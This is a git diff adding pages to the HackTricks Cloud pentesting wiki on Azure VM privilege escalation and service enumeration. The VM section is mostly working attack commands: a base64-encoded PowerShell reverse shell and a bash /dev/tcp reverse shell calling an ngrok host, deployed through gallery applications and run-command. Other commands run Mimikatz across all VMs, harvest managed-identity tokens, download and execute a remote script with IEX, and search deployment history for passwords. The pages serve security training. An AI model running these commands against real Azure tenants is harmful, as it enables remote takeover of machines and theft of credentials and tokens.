+export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
+az sig gallery-application version create \
+   --version-name 1.0.0 \
+   --application-name myReverseShellAppWin \
+   --gallery-name myGallery \
+   --location "West US 2" \
+   --resource-group <rsc-group> \
+   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
+   --install-command "powershell.exe -EncodedCommand $encodedCommand" \
+   --remove-command "powershell.exe -EncodedCommand $encodedCommand" \
+   --update-command "powershell.exe -EncodedCommand $encodedCommand"
+
+# Install the app in a VM to execute the rev shell
+## Use the ID given in the previous output
+az vm application set \
+   --resource-group <rsc-group> \
+   --name deleteme-win4 \
+   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
+   --treat-deployment-as-failure true
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+### `Microsoft.Compute/virtualMachines/runCommand/action`
+
+This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:**
+
+{% tabs %}
+{% tab title="Linux" %}
+```bash
+# Execute rev shell
+az vm run-command invoke \
+  --resource-group <rsc-group> \
+  --name <vm-name> \
+  --command-id RunShellScript \
+  --scripts @revshell.sh
+
+# revshell.sh file content
+echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
+```
+{% endtab %}
+
+{% tab title="Windows" %}
+```bash
+# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
+# Execute a rev shell
+az vm run-command invoke \
+  --resource-group Research \
+  --name juastavm \
+  --command-id RunPowerShellScript \
+  --scripts @revshell.ps1
+
+## Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+## Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
+export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
+
+# The content of 
+echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
+
+
+# Try to run in every machine
+Import-module MicroBurst.psm1
+Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
+```
+{% endtab %}
+{% endtabs %}
+
+### `Microsoft.Compute/virtualMachines/login/action`
+
+This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
+
+Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
+
+### `Microsoft.Compute/virtualMachines/loginAsAdmin/action`
+
+This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
+
+Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
+
+## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it.
+
+Depending on the situation more or less permissions might be needed to abuse this technique.
+
+{% code overflow="wrap" %}
+```bash
+az vm create \
+  --resource-group Resource_Group_1 \
+  --name cli_vm \
+  --image Ubuntu2204 \
+  --admin-username azureuser \
+  --generate-ssh-keys \
+  --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \
+  --nsg-rule ssh \
+  --location "centralus"
+# By default pub key from ~/.ssh is used (if none, it's generated there)
+```
+{% endcode %}
+
+### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\
+Then, from the metadata service it's possible to generate tokens for each one.
+
+{% code overflow="wrap" %}
+```bash
+# Get currently assigned managed identities to the VM
+az vm identity show \
+  --resource-group <rsc-group> \
+  --name <vm-name>
+
+# Assign several managed identities to a VM
+az vm identity assign \
+  --resource-group <rsc-group> \
+  --name <vm-name> \
+  --identities \
+    /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
+    /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
+```
+{% endcode %}
+
+Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
+
+### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
+
+According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image%20(1)%20(1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image%20(1)%20(1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image%20(2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image%20(2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md
new file mode 100644
index 0000000000..d2f2876e27
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/README.md
@@ -0,0 +1,99 @@
+# Az - Services
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Portals
+
+You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/)
+
+### Raw requests
+
+#### Azure API via Powershell
+
+Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
+
+Then query the Azure REST API to get the **subscription ID** and more .
+
+```powershell
+$Token = 'eyJ0eX..'
+$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
+# $URI = 'https://graph.microsoft.com/v1.0/applications'
+$RequestParams = @{
+ Method = 'GET'
+ Uri = $URI
+ Headers = @{
+ 'Authorization' = "Bearer $Token"
+ }
+}
+(Invoke-RestMethod @RequestParams).value 
+
+# List resources and check for runCommand privileges
+$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
+$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
+```
+
+#### Azure API via Python Version
+
+```python
+IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
+IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
+
+print("[+] Management API")
+cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
+val = os.popen(cmd).read()
+print("Access Token: "+json.loads(val)["access_token"])
+print("ClientID/AccountID: "+json.loads(val)["client_id"])
+
+print("\r\n[+] Graph API")
+cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
+val = os.popen(cmd).read()
+print(json.loads(val)["access_token"])
+print("ClientID/AccountID: "+json.loads(val)["client_id"])
+```
+
+or inside a Python Function:
+
+```python
+import logging, os
+import azure.functions as func
+
+def main(req: func.HttpRequest) -> func.HttpResponse:
+    logging.info('Python HTTP trigger function processed a request.')
+    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
+    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
+    cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
+    val = os.popen(cmd).read()
+    return func.HttpResponse(val, status_code=200)
+```
+
+## List of Services
+
+**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md
new file mode 100644
index 0000000000..e3c5bf95c9
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-acr.md
@@ -0,0 +1,76 @@
+# Az - ACR
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services.
+
+### Enumerate
+
+To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1):
+
+{% code overflow="wrap" %}
+```bash
+# List Docker images inside the registry
+IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
+
+Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
+
+Get-AzACR -username <username> -password <password> -registry <corp-name>.azurecr.io
+```
+{% endcode %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+az acr list --output table
+az acr show --name MyRegistry --resource-group MyResourceGroup
+```
+{% endtab %}
+
+{% tab title="Az Powershell" %}
+```powershell
+# List all ACRs in your subscription
+Get-AzContainerRegistry
+
+# Get a specific ACR
+Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry"
+```
+{% endtab %}
+{% endtabs %}
+
+Login & Pull from the registry
+
+```bash
+docker login <corp-name>.azurecr.io --username <username> --password <password>
+docker pull <corp-name>.azurecr.io/<image>:<tag>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md
new file mode 100644
index 0000000000..8b5f6c1c07
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-application-proxy.md
@@ -0,0 +1,66 @@
+# Az - Application Proxy
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy)
+
+Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal.
+
+It works like this:
+
+<figure><img src="../../../.gitbook/assets/image (186).png" alt=""><figcaption></figcaption></figure>
+
+1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**.
+2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device.
+3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**.
+4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user.
+5. The connector sends the request to the **on-premises application**.
+6. The **response** is sent through the connector and Application Proxy service **to the user**.
+
+## Enumeration
+
+```powershell
+# Enumerate applications with application proxy configured 
+Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
+
+# Get applications service principal
+Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"}
+
+# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app
+# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it
+Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <object-id>
+```
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md
new file mode 100644
index 0000000000..b594c6aa78
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-arm-templates.md
@@ -0,0 +1,57 @@
+# Az - ARM Templates / Deployments
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
+
+### History
+
+If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**.
+
+## Search Sensitive Info
+
+Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**.
+
+```powershell
+Get-AzResourceGroup
+Get-AzResourceGroupDeployment -ResourceGroupName <name>
+
+# Export
+Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
+cat <DEPLOYMENT NAME>.json # search for hardcoded password
+cat <PATH TO .json FILE> | Select-String password
+```
+
+## References
+
+* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
new file mode 100644
index 0000000000..8f27979031
--- /dev/null
